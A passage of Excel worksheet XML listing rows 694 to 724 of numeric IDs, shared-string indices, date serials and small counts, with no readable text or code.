        <v>259769</v>
      </c>
      <c r="F694" s="9" t="s">
        <v>3807</v>
      </c>
      <c r="G694" s="10">
        <v>42353.254166666666</v>
      </c>
      <c r="H694" s="9">
        <v>2833965</v>
      </c>
      <c r="I694" s="9" t="s">
        <v>3808</v>
      </c>
      <c r="J694" s="10">
        <v>42353.252083333333</v>
      </c>
      <c r="K694" s="9" t="s">
        <v>1523</v>
      </c>
      <c r="L694" s="7">
        <v>3</v>
      </c>
      <c r="M694" s="7">
        <v>1</v>
      </c>
      <c r="N694" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="695" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A695" s="9">
        <v>353497</v>
      </c>
      <c r="B695" s="9" t="s">
        <v>1524</v>
      </c>
      <c r="C695" s="9" t="s">
        <v>3809</v>
      </c>
      <c r="D695" s="9" t="s">
        <v>3810</v>
      </c>
      <c r="E695" s="9">
        <v>34795</v>
      </c>
      <c r="F695" s="9" t="s">
        <v>3811</v>
      </c>
      <c r="G695" s="10">
        <v>39791.795138888891</v>
      </c>
      <c r="H695" s="9">
        <v>34795</v>
      </c>
      <c r="I695" s="9" t="s">
        <v>3811</v>
      </c>
      <c r="J695" s="10">
        <v>39791.709722222222</v>
      </c>
      <c r="K695" s="9" t="s">
        <v>1525</v>
      </c>
      <c r="L695" s="7">
        <v>2</v>
      </c>
      <c r="M695" s="7">
        <v>1</v>
      </c>
      <c r="Q695" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="696" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A696" s="9">
        <v>354488</v>
      </c>
      <c r="B696" s="9" t="s">
        <v>1526</v>
      </c>
      <c r="C696" s="9" t="s">
        <v>3812</v>
      </c>
      <c r="D696" s="9" t="s">
        <v>3813</v>
      </c>
      <c r="E696" s="9">
        <v>2754</v>
      </c>
      <c r="F696" s="9" t="s">
        <v>3814</v>
      </c>
      <c r="G696" s="10">
        <v>39792.259027777778</v>
      </c>
      <c r="H696" s="9">
        <v>5314</v>
      </c>
      <c r="I696" s="9" t="s">
        <v>3815</v>
      </c>
      <c r="J696" s="10">
        <v>39791.947916666664</v>
      </c>
      <c r="K696" s="9" t="s">
        <v>1527</v>
      </c>
      <c r="L696" s="7">
        <v>4</v>
      </c>
      <c r="M696" s="7">
        <v>2</v>
      </c>
      <c r="N696" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="697" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A697" s="9">
        <v>355813</v>
      </c>
      <c r="B697" s="9" t="s">
        <v>1528</v>
      </c>
      <c r="C697" s="9" t="s">
        <v>3816</v>
      </c>
      <c r="D697" s="9" t="s">
        <v>3817</v>
      </c>
      <c r="E697" s="9">
        <v>28543</v>
      </c>
      <c r="F697" s="9" t="s">
        <v>3818</v>
      </c>
      <c r="G697" s="10">
        <v>39792.496527777781</v>
      </c>
      <c r="H697" s="9">
        <v>28543</v>
      </c>
      <c r="I697" s="9" t="s">
        <v>3818</v>
      </c>
      <c r="J697" s="10">
        <v>39792.492361111108</v>
      </c>
      <c r="K697" s="9" t="s">
        <v>1529</v>
      </c>
      <c r="L697" s="7">
        <v>2</v>
      </c>
      <c r="M697" s="7">
        <v>1</v>
      </c>
      <c r="N697" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="698" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A698" s="9">
        <v>355945</v>
      </c>
      <c r="B698" s="9" t="s">
        <v>1530</v>
      </c>
      <c r="C698" s="9" t="s">
        <v>3819</v>
      </c>
      <c r="D698" s="9" t="s">
        <v>3820</v>
      </c>
      <c r="E698" s="9">
        <v>71059</v>
      </c>
      <c r="F698" s="9" t="s">
        <v>3821</v>
      </c>
      <c r="G698" s="10">
        <v>41424.365972222222</v>
      </c>
      <c r="H698" s="9">
        <v>661933</v>
      </c>
      <c r="I698" s="9" t="s">
        <v>1673</v>
      </c>
      <c r="J698" s="10">
        <v>41424.361805555556</v>
      </c>
      <c r="K698" s="9" t="s">
        <v>1531</v>
      </c>
      <c r="L698" s="7">
        <v>3</v>
      </c>
      <c r="M698" s="7">
        <v>1</v>
      </c>
      <c r="N698" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="699" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A699" s="9">
        <v>356371</v>
      </c>
      <c r="B699" s="9" t="s">
        <v>1532</v>
      </c>
      <c r="C699" s="9" t="s">
        <v>3822</v>
      </c>
      <c r="D699" s="9" t="s">
        <v>3823</v>
      </c>
      <c r="E699" s="9">
        <v>39259</v>
      </c>
      <c r="F699" s="9" t="s">
        <v>3824</v>
      </c>
      <c r="G699" s="10">
        <v>39793.34652777778</v>
      </c>
      <c r="H699" s="9">
        <v>39259</v>
      </c>
      <c r="I699" s="9" t="s">
        <v>3824</v>
      </c>
      <c r="J699" s="10">
        <v>39793.34652777778</v>
      </c>
      <c r="K699" s="9" t="s">
        <v>1533</v>
      </c>
      <c r="L699" s="7">
        <v>3</v>
      </c>
      <c r="M699" s="7">
        <v>1</v>
      </c>
      <c r="N699" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="700" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A700" s="9">
        <v>357364</v>
      </c>
      <c r="B700" s="9" t="s">
        <v>1534</v>
      </c>
      <c r="C700" s="9" t="s">
        <v>3825</v>
      </c>
      <c r="D700" s="9" t="s">
        <v>3826</v>
      </c>
      <c r="E700" s="9">
        <v>45</v>
      </c>
      <c r="F700" s="9" t="s">
        <v>3827</v>
      </c>
      <c r="G700" s="10">
        <v>39792.832638888889</v>
      </c>
      <c r="H700" s="9">
        <v>13913</v>
      </c>
      <c r="I700" s="9" t="s">
        <v>2821</v>
      </c>
      <c r="J700" s="10">
        <v>39792.829861111109</v>
      </c>
      <c r="K700" s="9" t="s">
        <v>1535</v>
      </c>
      <c r="L700" s="7">
        <v>3</v>
      </c>
      <c r="M700" s="7">
        <v>1</v>
      </c>
      <c r="N700" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="701" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A701" s="9">
        <v>358964</v>
      </c>
      <c r="B701" s="9" t="s">
        <v>1536</v>
      </c>
      <c r="C701" s="9" t="s">
        <v>3828</v>
      </c>
      <c r="D701" s="9" t="s">
        <v>3829</v>
      </c>
      <c r="E701" s="9">
        <v>714</v>
      </c>
      <c r="F701" s="9" t="s">
        <v>3188</v>
      </c>
      <c r="G701" s="10">
        <v>39795.354166666664</v>
      </c>
      <c r="H701" s="9">
        <v>4103</v>
      </c>
      <c r="I701" s="9" t="s">
        <v>3830</v>
      </c>
      <c r="J701" s="10">
        <v>39794.265972222223</v>
      </c>
      <c r="K701" s="9" t="s">
        <v>1537</v>
      </c>
      <c r="L701" s="7">
        <v>6</v>
      </c>
      <c r="M701" s="7">
        <v>4</v>
      </c>
      <c r="N701" s="9" t="s">
        <v>705</v>
      </c>
    </row>
    <row r="702" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A702" s="9">
        <v>359438</v>
      </c>
      <c r="B702" s="9" t="s">
        <v>1538</v>
      </c>
      <c r="C702" s="9" t="s">
        <v>3831</v>
      </c>
      <c r="D702" s="9" t="s">
        <v>3832</v>
      </c>
      <c r="E702" s="9">
        <v>2173</v>
      </c>
      <c r="F702" s="9" t="s">
        <v>3833</v>
      </c>
      <c r="G702" s="10">
        <v>39813.85</v>
      </c>
      <c r="H702" s="9">
        <v>2173</v>
      </c>
      <c r="I702" s="9" t="s">
        <v>3833</v>
      </c>
      <c r="J702" s="10">
        <v>39813.849305555559</v>
      </c>
      <c r="K702" s="9" t="s">
        <v>1539</v>
      </c>
      <c r="L702" s="7">
        <v>4</v>
      </c>
      <c r="M702" s="7">
        <v>2</v>
      </c>
      <c r="N702" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="703" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A703" s="9">
        <v>359494</v>
      </c>
      <c r="B703" s="9" t="s">
        <v>1540</v>
      </c>
      <c r="C703" s="9" t="s">
        <v>3834</v>
      </c>
      <c r="D703" s="9" t="s">
        <v>3835</v>
      </c>
      <c r="E703" s="9">
        <v>426671</v>
      </c>
      <c r="F703" s="9" t="s">
        <v>2101</v>
      </c>
      <c r="G703" s="10">
        <v>42816.675694444442</v>
      </c>
      <c r="H703" s="9">
        <v>7275984</v>
      </c>
      <c r="I703" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J703" s="10">
        <v>42815.833333333336</v>
      </c>
      <c r="K703" s="9" t="s">
        <v>1541</v>
      </c>
      <c r="L703" s="7">
        <v>14</v>
      </c>
      <c r="M703" s="7">
        <v>12</v>
      </c>
      <c r="N703" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="704" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A704" s="3">
        <v>360610</v>
      </c>
      <c r="B704" s="3" t="s">
        <v>717</v>
      </c>
      <c r="C704" s="9" t="s">
        <v>3836</v>
      </c>
      <c r="D704" s="9" t="s">
        <v>3837</v>
      </c>
      <c r="E704" s="9">
        <v>18771</v>
      </c>
      <c r="F704" s="9" t="s">
        <v>791</v>
      </c>
      <c r="G704" s="10">
        <v>39793.853472222225</v>
      </c>
      <c r="H704" s="9">
        <v>3848</v>
      </c>
      <c r="I704" s="9" t="s">
        <v>3733</v>
      </c>
      <c r="J704" s="10">
        <v>39793.851388888892</v>
      </c>
      <c r="K704" s="3" t="s">
        <v>739</v>
      </c>
      <c r="L704" s="6">
        <v>4</v>
      </c>
      <c r="M704" s="6">
        <v>2</v>
      </c>
      <c r="N704" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O704" s="3"/>
      <c r="P704" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q704" s="3"/>
    </row>
    <row r="705" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A705" s="3">
        <v>362133</v>
      </c>
      <c r="B705" s="3" t="s">
        <v>718</v>
      </c>
      <c r="C705" s="9" t="s">
        <v>3838</v>
      </c>
      <c r="D705" s="9" t="s">
        <v>3839</v>
      </c>
      <c r="E705" s="9">
        <v>31582</v>
      </c>
      <c r="F705" s="9" t="s">
        <v>792</v>
      </c>
      <c r="G705" s="10">
        <v>39795.411111111112</v>
      </c>
      <c r="H705" s="9">
        <v>1190</v>
      </c>
      <c r="I705" s="9" t="s">
        <v>2757</v>
      </c>
      <c r="J705" s="10">
        <v>39795.079861111109</v>
      </c>
      <c r="K705" s="3" t="s">
        <v>740</v>
      </c>
      <c r="L705" s="6">
        <v>3</v>
      </c>
      <c r="M705" s="6">
        <v>1</v>
      </c>
      <c r="N705" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O705" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P705" s="3"/>
      <c r="Q705" s="3"/>
    </row>
    <row r="706" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A706" s="3">
        <v>363708</v>
      </c>
      <c r="B706" s="3" t="s">
        <v>719</v>
      </c>
      <c r="C706" s="9" t="s">
        <v>3840</v>
      </c>
      <c r="D706" s="9" t="s">
        <v>3841</v>
      </c>
      <c r="E706" s="9">
        <v>100297</v>
      </c>
      <c r="F706" s="9" t="s">
        <v>793</v>
      </c>
      <c r="G706" s="10">
        <v>43504.59097222222</v>
      </c>
      <c r="H706" s="9">
        <v>648955</v>
      </c>
      <c r="I706" s="9" t="s">
        <v>3842</v>
      </c>
      <c r="J706" s="10">
        <v>43504.158333333333</v>
      </c>
      <c r="K706" s="3" t="s">
        <v>741</v>
      </c>
      <c r="L706" s="6">
        <v>5</v>
      </c>
      <c r="M706" s="6">
        <v>3</v>
      </c>
      <c r="N706" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O706" s="3"/>
      <c r="P706" s="3"/>
      <c r="Q706" s="3"/>
    </row>
    <row r="707" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A707" s="3">
        <v>363713</v>
      </c>
      <c r="B707" s="3" t="s">
        <v>720</v>
      </c>
      <c r="C707" s="9" t="s">
        <v>3843</v>
      </c>
      <c r="D707" s="9" t="s">
        <v>3844</v>
      </c>
      <c r="E707" s="9">
        <v>1288</v>
      </c>
      <c r="F707" s="9" t="s">
        <v>794</v>
      </c>
      <c r="G707" s="10">
        <v>43504.543055555558</v>
      </c>
      <c r="H707" s="9">
        <v>648955</v>
      </c>
      <c r="I707" s="9" t="s">
        <v>3842</v>
      </c>
      <c r="J707" s="10">
        <v>43504.176388888889</v>
      </c>
      <c r="K707" s="3" t="s">
        <v>742</v>
      </c>
      <c r="L707" s="6">
        <v>3</v>
      </c>
      <c r="M707" s="6">
        <v>1</v>
      </c>
      <c r="N707" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O707" s="3"/>
      <c r="P707" s="3"/>
      <c r="Q707" s="3"/>
    </row>
    <row r="708" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A708" s="3">
        <v>363732</v>
      </c>
      <c r="B708" s="3" t="s">
        <v>721</v>
      </c>
      <c r="C708" s="9" t="s">
        <v>3845</v>
      </c>
      <c r="D708" s="9" t="s">
        <v>3846</v>
      </c>
      <c r="E708" s="9">
        <v>100297</v>
      </c>
      <c r="F708" s="9" t="s">
        <v>793</v>
      </c>
      <c r="G708" s="10">
        <v>43504.592361111114</v>
      </c>
      <c r="H708" s="9">
        <v>648955</v>
      </c>
      <c r="I708" s="9" t="s">
        <v>3842</v>
      </c>
      <c r="J708" s="10">
        <v>43504.160416666666</v>
      </c>
      <c r="K708" s="3" t="s">
        <v>743</v>
      </c>
      <c r="L708" s="6">
        <v>17</v>
      </c>
      <c r="M708" s="6">
        <v>15</v>
      </c>
      <c r="N708" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O708" s="3"/>
      <c r="P708" s="3"/>
      <c r="Q708" s="3"/>
    </row>
    <row r="709" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A709" s="3">
        <v>364274</v>
      </c>
      <c r="B709" s="3" t="s">
        <v>722</v>
      </c>
      <c r="C709" s="9" t="s">
        <v>3847</v>
      </c>
      <c r="D709" s="9" t="s">
        <v>3848</v>
      </c>
      <c r="E709" s="9">
        <v>4435</v>
      </c>
      <c r="F709" s="9" t="s">
        <v>795</v>
      </c>
      <c r="G709" s="10">
        <v>39797.680555555555</v>
      </c>
      <c r="H709" s="9">
        <v>4435</v>
      </c>
      <c r="I709" s="9" t="s">
        <v>795</v>
      </c>
      <c r="J709" s="10">
        <v>39797.679861111108</v>
      </c>
      <c r="K709" s="3" t="s">
        <v>744</v>
      </c>
      <c r="L709" s="6">
        <v>3</v>
      </c>
      <c r="M709" s="6">
        <v>1</v>
      </c>
      <c r="N709" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O709" s="3"/>
      <c r="P709" s="3"/>
      <c r="Q709" s="3"/>
    </row>
    <row r="710" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A710" s="3">
        <v>364769</v>
      </c>
      <c r="B710" s="3" t="s">
        <v>723</v>
      </c>
      <c r="C710" s="9" t="s">
        <v>3849</v>
      </c>
      <c r="D710" s="9" t="s">
        <v>3850</v>
      </c>
      <c r="E710" s="9">
        <v>35092</v>
      </c>
      <c r="F710" s="9" t="s">
        <v>796</v>
      </c>
      <c r="G710" s="10">
        <v>42993.757638888892</v>
      </c>
      <c r="H710" s="9">
        <v>7410631</v>
      </c>
      <c r="I710" s="9" t="s">
        <v>3851</v>
      </c>
      <c r="J710" s="10">
        <v>42993.740277777775</v>
      </c>
      <c r="K710" s="3" t="s">
        <v>745</v>
      </c>
      <c r="L710" s="6">
        <v>4</v>
      </c>
      <c r="M710" s="6">
        <v>4</v>
      </c>
      <c r="N710" s="3" t="s">
        <v>697</v>
      </c>
      <c r="O710" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P710" s="3" t="s">
        <v>710</v>
      </c>
      <c r="Q710" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="711" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A711" s="3">
        <v>366026</v>
      </c>
      <c r="B711" s="3" t="s">
        <v>724</v>
      </c>
      <c r="C711" s="9" t="s">
        <v>3852</v>
      </c>
      <c r="D711" s="9" t="s">
        <v>3853</v>
      </c>
      <c r="E711" s="9">
        <v>25222</v>
      </c>
      <c r="F711" s="9" t="s">
        <v>797</v>
      </c>
      <c r="G711" s="10">
        <v>40785.814583333333</v>
      </c>
      <c r="H711" s="9">
        <v>-1</v>
      </c>
      <c r="I711" s="9" t="s">
        <v>2025</v>
      </c>
      <c r="J711" s="10">
        <v>40785.470833333333</v>
      </c>
      <c r="K711" s="3" t="s">
        <v>746</v>
      </c>
      <c r="L711" s="6">
        <v>3</v>
      </c>
      <c r="M711" s="6">
        <v>1</v>
      </c>
      <c r="N711" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O711" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P711" s="3"/>
      <c r="Q711" s="3"/>
    </row>
    <row r="712" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A712" s="3">
        <v>367344</v>
      </c>
      <c r="B712" s="3" t="s">
        <v>725</v>
      </c>
      <c r="C712" s="9" t="s">
        <v>3854</v>
      </c>
      <c r="D712" s="9" t="s">
        <v>3855</v>
      </c>
      <c r="E712" s="9">
        <v>1737192</v>
      </c>
      <c r="F712" s="9" t="s">
        <v>798</v>
      </c>
      <c r="G712" s="10">
        <v>41580.309027777781</v>
      </c>
      <c r="H712" s="9">
        <v>63550</v>
      </c>
      <c r="I712" s="9" t="s">
        <v>1722</v>
      </c>
      <c r="J712" s="10">
        <v>41579.622916666667</v>
      </c>
      <c r="K712" s="3" t="s">
        <v>747</v>
      </c>
      <c r="L712" s="6">
        <v>7</v>
      </c>
      <c r="M712" s="6">
        <v>5</v>
      </c>
      <c r="N712" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O712" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P712" s="3" t="s">
        <v>697</v>
      </c>
      <c r="Q712" s="3"/>
    </row>
    <row r="713" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A713" s="3">
        <v>367714</v>
      </c>
      <c r="B713" s="3" t="s">
        <v>726</v>
      </c>
      <c r="C713" s="9" t="s">
        <v>3856</v>
      </c>
      <c r="D713" s="9" t="s">
        <v>3857</v>
      </c>
      <c r="E713" s="9">
        <v>584192</v>
      </c>
      <c r="F713" s="9" t="s">
        <v>799</v>
      </c>
      <c r="G713" s="10">
        <v>43563.525694444441</v>
      </c>
      <c r="H713" s="9">
        <v>1446916</v>
      </c>
      <c r="I713" s="9" t="s">
        <v>3858</v>
      </c>
      <c r="J713" s="10">
        <v>43351.363194444442</v>
      </c>
      <c r="K713" s="3" t="s">
        <v>748</v>
      </c>
      <c r="L713" s="6">
        <v>7</v>
      </c>
      <c r="M713" s="6">
        <v>5</v>
      </c>
      <c r="N713" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O713" s="3"/>
      <c r="P713" s="3"/>
      <c r="Q713" s="3"/>
    </row>
    <row r="714" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A714" s="3">
        <v>367794</v>
      </c>
      <c r="B714" s="3" t="s">
        <v>727</v>
      </c>
      <c r="C714" s="9" t="s">
        <v>3859</v>
      </c>
      <c r="D714" s="9" t="s">
        <v>3859</v>
      </c>
      <c r="E714" s="9">
        <v>45786</v>
      </c>
      <c r="F714" s="9" t="s">
        <v>800</v>
      </c>
      <c r="G714" s="10">
        <v>41550.543749999997</v>
      </c>
      <c r="H714" s="9">
        <v>45786</v>
      </c>
      <c r="I714" s="9" t="s">
        <v>800</v>
      </c>
      <c r="J714" s="10">
        <v>41550.543749999997</v>
      </c>
      <c r="K714" s="3" t="s">
        <v>749</v>
      </c>
      <c r="L714" s="6">
        <v>3</v>
      </c>
      <c r="M714" s="6">
        <v>1</v>
      </c>
      <c r="N714" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O714" s="3"/>
      <c r="P714" s="3"/>
      <c r="Q714" s="3"/>
    </row>
    <row r="715" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A715" s="3">
        <v>369583</v>
      </c>
      <c r="B715" s="3" t="s">
        <v>728</v>
      </c>
      <c r="C715" s="9" t="s">
        <v>3860</v>
      </c>
      <c r="D715" s="9" t="s">
        <v>3861</v>
      </c>
      <c r="E715" s="9">
        <v>2548</v>
      </c>
      <c r="F715" s="9" t="s">
        <v>801</v>
      </c>
      <c r="G715" s="10">
        <v>41002.6</v>
      </c>
      <c r="H715" s="9">
        <v>1140579</v>
      </c>
      <c r="I715" s="9" t="s">
        <v>3862</v>
      </c>
      <c r="J715" s="10">
        <v>41002.432638888888</v>
      </c>
      <c r="K715" s="3" t="s">
        <v>750</v>
      </c>
      <c r="L715" s="6">
        <v>3</v>
      </c>
      <c r="M715" s="6">
        <v>1</v>
      </c>
      <c r="N715" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O715" s="3"/>
      <c r="P715" s="3"/>
      <c r="Q715" s="3"/>
    </row>
    <row r="716" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A716" s="3">
        <v>370862</v>
      </c>
      <c r="B716" s="3" t="s">
        <v>729</v>
      </c>
      <c r="C716" s="9" t="s">
        <v>3863</v>
      </c>
      <c r="D716" s="9" t="s">
        <v>3864</v>
      </c>
      <c r="E716" s="9">
        <v>33708</v>
      </c>
      <c r="F716" s="9" t="s">
        <v>3865</v>
      </c>
      <c r="G716" s="10">
        <v>39798.746527777781</v>
      </c>
      <c r="H716" s="9">
        <v>33708</v>
      </c>
      <c r="I716" s="9" t="s">
        <v>3865</v>
      </c>
      <c r="J716" s="10">
        <v>39798.602777777778</v>
      </c>
      <c r="K716" s="3" t="s">
        <v>751</v>
      </c>
      <c r="L716" s="6">
        <v>4</v>
      </c>
      <c r="M716" s="6">
        <v>2</v>
      </c>
      <c r="N716" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O716" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P716" s="3"/>
      <c r="Q716" s="3"/>
    </row>
    <row r="717" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A717" s="3">
        <v>370967</v>
      </c>
      <c r="B717" s="3" t="s">
        <v>730</v>
      </c>
      <c r="C717" s="9" t="s">
        <v>3866</v>
      </c>
      <c r="D717" s="9" t="s">
        <v>3867</v>
      </c>
      <c r="E717" s="9">
        <v>207421</v>
      </c>
      <c r="F717" s="9" t="s">
        <v>802</v>
      </c>
      <c r="G717" s="10">
        <v>42304.868055555555</v>
      </c>
      <c r="H717" s="9">
        <v>363573</v>
      </c>
      <c r="I717" s="9" t="s">
        <v>3747</v>
      </c>
      <c r="J717" s="10">
        <v>42304.866666666669</v>
      </c>
      <c r="K717" s="3" t="s">
        <v>752</v>
      </c>
      <c r="L717" s="6">
        <v>4</v>
      </c>
      <c r="M717" s="6">
        <v>2</v>
      </c>
      <c r="N717" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O717" s="3"/>
      <c r="P717" s="3"/>
      <c r="Q717" s="3"/>
    </row>
    <row r="718" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A718" s="3">
        <v>372697</v>
      </c>
      <c r="B718" s="3" t="s">
        <v>731</v>
      </c>
      <c r="C718" s="9" t="s">
        <v>3868</v>
      </c>
      <c r="D718" s="9" t="s">
        <v>3869</v>
      </c>
      <c r="E718" s="9">
        <v>1544</v>
      </c>
      <c r="F718" s="9" t="s">
        <v>803</v>
      </c>
      <c r="G718" s="10">
        <v>39798.881249999999</v>
      </c>
      <c r="H718" s="9">
        <v>1544</v>
      </c>
      <c r="I718" s="9" t="s">
        <v>803</v>
      </c>
      <c r="J718" s="10">
        <v>39798.881249999999</v>
      </c>
      <c r="K718" s="3" t="s">
        <v>753</v>
      </c>
      <c r="L718" s="6">
        <v>3</v>
      </c>
      <c r="M718" s="6">
        <v>1</v>
      </c>
      <c r="N718" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O718" s="3"/>
      <c r="P718" s="3"/>
      <c r="Q718" s="3"/>
    </row>
    <row r="719" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A719" s="3">
        <v>374315</v>
      </c>
      <c r="B719" s="3" t="s">
        <v>732</v>
      </c>
      <c r="C719" s="9" t="s">
        <v>3870</v>
      </c>
      <c r="D719" s="9" t="s">
        <v>3871</v>
      </c>
      <c r="E719" s="9">
        <v>44084</v>
      </c>
      <c r="F719" s="9" t="s">
        <v>804</v>
      </c>
      <c r="G719" s="10">
        <v>39815.622916666667</v>
      </c>
      <c r="H719" s="9">
        <v>44084</v>
      </c>
      <c r="I719" s="9" t="s">
        <v>804</v>
      </c>
      <c r="J719" s="10">
        <v>39799.493750000001</v>
      </c>
      <c r="K719" s="3" t="s">
        <v>754</v>
      </c>
      <c r="L719" s="6">
        <v>2</v>
      </c>
      <c r="M719" s="6">
        <v>1</v>
      </c>
      <c r="N719" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O719" s="3"/>
      <c r="P719" s="3"/>
      <c r="Q719" s="3"/>
    </row>
    <row r="720" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A720" s="3">
        <v>374393</v>
      </c>
      <c r="B720" s="3" t="s">
        <v>733</v>
      </c>
      <c r="C720" s="9" t="s">
        <v>3872</v>
      </c>
      <c r="D720" s="9" t="s">
        <v>3873</v>
      </c>
      <c r="E720" s="9">
        <v>3476191</v>
      </c>
      <c r="F720" s="9" t="s">
        <v>805</v>
      </c>
      <c r="G720" s="10">
        <v>42675.038194444445</v>
      </c>
      <c r="H720" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I720" s="9" t="s">
        <v>3874</v>
      </c>
      <c r="J720" s="10">
        <v>42675.038194444445</v>
      </c>
      <c r="K720" s="3" t="s">
        <v>755</v>
      </c>
      <c r="L720" s="6">
        <v>5</v>
      </c>
      <c r="M720" s="6">
        <v>3</v>
      </c>
      <c r="N720" s="3" t="s">
        <v>706</v>
      </c>
      <c r="O720" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P720" s="3"/>
      <c r="Q720" s="3"/>
    </row>
    <row r="721" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A721" s="3">
        <v>374695</v>
      </c>
      <c r="B721" s="3" t="s">
        <v>734</v>
      </c>
      <c r="C721" s="9" t="s">
        <v>3875</v>
      </c>
      <c r="D721" s="9" t="s">
        <v>3876</v>
      </c>
      <c r="E721" s="9">
        <v>31722</v>
      </c>
      <c r="F721" s="9" t="s">
        <v>806</v>
      </c>
      <c r="G721" s="10">
        <v>39799.634027777778</v>
      </c>
      <c r="H721" s="9">
        <v>31722</v>
      </c>
      <c r="I721" s="9" t="s">
        <v>806</v>
      </c>
      <c r="J721" s="10">
        <v>39799.602777777778</v>
      </c>
      <c r="K721" s="3" t="s">
        <v>756</v>
      </c>
      <c r="L721" s="6">
        <v>2</v>
      </c>
      <c r="M721" s="6">
        <v>1</v>
      </c>
      <c r="N721" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O721" s="3"/>
      <c r="P721" s="3"/>
      <c r="Q721" s="3"/>
    </row>
    <row r="722" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A722" s="9">
        <v>376551</v>
      </c>
      <c r="B722" s="9" t="s">
        <v>1542</v>
      </c>
      <c r="C722" s="9" t="s">
        <v>3877</v>
      </c>
      <c r="D722" s="9" t="s">
        <v>3878</v>
      </c>
      <c r="E722" s="9">
        <v>12930</v>
      </c>
      <c r="F722" s="9" t="s">
        <v>3879</v>
      </c>
      <c r="G722" s="10">
        <v>39800.051388888889</v>
      </c>
      <c r="H722" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I722" s="9" t="s">
        <v>2029</v>
      </c>
      <c r="J722" s="10">
        <v>39800.043055555558</v>
      </c>
      <c r="K722" s="9" t="s">
        <v>1543</v>
      </c>
      <c r="L722" s="7">
        <v>3</v>
      </c>
      <c r="M722" s="7">
        <v>1</v>
      </c>
      <c r="Q722" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="723" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A723" s="3">
        <v>376691</v>
      </c>
      <c r="B723" s="3" t="s">
        <v>735</v>
      </c>
      <c r="C723" s="9" t="s">
        <v>3880</v>
      </c>
      <c r="D723" s="9" t="s">
        <v>3881</v>
      </c>
      <c r="E723" s="9">
        <v>46239</v>
      </c>
      <c r="F723" s="9" t="s">
        <v>807</v>
      </c>
      <c r="G723" s="10">
        <v>42032.954861111109</v>
      </c>
      <c r="H723" s="9">
        <v>285795</v>
      </c>
      <c r="I723" s="9" t="s">
        <v>3882</v>
      </c>
      <c r="J723" s="10">
        <v>42030.609027777777</v>
      </c>
      <c r="K723" s="3" t="s">
        <v>757</v>
      </c>
      <c r="L723" s="6">
        <v>3</v>
      </c>
      <c r="M723" s="6">
        <v>1</v>
      </c>
      <c r="N723" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O723" s="3" t="s">
        <v>704</v>
      </c>
      <c r="P723" s="3"/>
      <c r="Q723" s="3"/>
    </row>
    <row r="724" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A724" s="3">
        <v>377108</v>
      </c>
      <c r="B724" s="3" t="s">
        <v>736</v>
      </c>
